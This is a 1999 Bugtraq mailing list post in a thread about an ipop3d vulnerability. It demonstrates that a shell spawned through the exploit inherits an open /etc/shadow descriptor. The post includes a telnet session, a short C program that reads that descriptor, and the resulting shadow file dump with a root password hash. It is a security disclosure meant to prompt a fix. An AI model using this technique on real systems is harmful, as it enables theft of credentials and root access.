Bugtraq mailing list archives
Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight
From: woloszyn () it pl (M.C.Mar)
Date: Thu, 8 Apr 1999 16:39:30 +0200
On Tue, 6 Apr 1999, Stefan Rompf wrote:
Hello Michal, At 01:41 07.03.99 +0100, you wrote:Exploited overflow in ipop3d could be used to gain superuser access (the only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage: If the effective user ID of the process calling setuid() is the super-user, the real, effective, and saved user IDs are set to the uid parameter. Linux behaves the same way, IMHO this is defined in POSIX.
But, (un)fortunately when exploiting ipop3d I found something like this: Grabarz:~emsi# lsof -n | grep 1190 sh 1190 emsi cwd DIR 8,1 1024 2 / sh 1190 emsi rtd DIR 8,1 1024 2 / sh 1190 emsi txt REG 8,1 279352 16324 /bin/bash sh 1190 emsi mem REG 8,1 78828 30629 /lib/ld-linux.so.1.9.5 sh 1190 emsi mem REG 8,1 11493 79564 /lib/libtermcap.so.2.0.8 sh 1190 emsi mem REG 8,1 605044 79566 /lib/libc.so.5.4.33 [...] sh 1190 emsi 3r REG 8,1 598 24674 /etc/shadow Shel spawned via ipop3d explotation (no bonus -- no exploit core) inherits opened fd :) So we may do something like this: emsi:~emsi# telnet grabarz 110 Trying 192.168.0.19... Connected to grabarz. Escape character is '^]'. +OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRC () CAC Washington EDU) at Fri, 9 Apr 1999 15:19:33 +0000 ( ) user emsi +OK User name accepted, password please pass qpqp01 id; uid=1002(emsi) gid=100(users) groups=100(users) : command not found bash -i; bash$ cd ~emsi cd ~emsi bash$ bash$ cat p.c cat p.c char buf[255]; lseek(3,0,0); read(3,buf,255); printf("Be my guest:\n%s\n",buf); } bash$ bash$ gcc p.c gcc p.c bash$ ./a.out Be my guest: root:csKcGWMEUMGUs:10539:0::::: halt:*:9797:0::::: operator:*:9797:0::::: shutdown:*:9797:0::::: sync:*:9797:0::::: bin:*:9797:0::::: ftp:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: mail:*:9797:0::::: postmaster:*:9797:0::::: new¿¤þ^ ` bash$ bash$ That's only example... It proofs that exploiting ipop3d could be usefull to obtain root (or any other account) access and that the vulnerability should be fixed. P.S. Greetings Lam3rZ Group, 3Kombajd_do_czere¶ni testers and Lcamtuf (ty lamo, czy wkoñcu pode¶lesz mi ten txt co mi obieca³e¶? ;). -- ___________________________________________________________________________ M.C.Mar An NT server can be run by an idiot, and usually is. emsi () it pl "If you can't make it good, make it LOOK good." - Bill Gates Moze to nie miejsce, ale tak np. programy M$ to swoiste pomniki glupoty.
Current thread:
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight, (continued)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Miguel de Icaza (Apr 11)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Miguel de Icaza (Apr 05)
- Multiple WinGate Vulnerabilities[Tad late] Marc (Apr 05)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Stefan Rompf (Apr 06)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Viktor Fougstedt (Apr 07)
- security hole (READ AS: security chasm) in ICQ-Webserver DaChronic (Apr 07)
- Re: security hole (READ AS: security chasm) in ICQ-Webserver sven () MSC-MEDIA COM (Apr 08)
- Bug in Winroute 3.04g Michael R. Rudel (Apr 08)
- Re: Bug in Winroute 3.04g Max Vision (Apr 09)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Viktor Fougstedt (Apr 07)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Casper Dik (Apr 08)
- Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight M.C.Mar (Apr 08)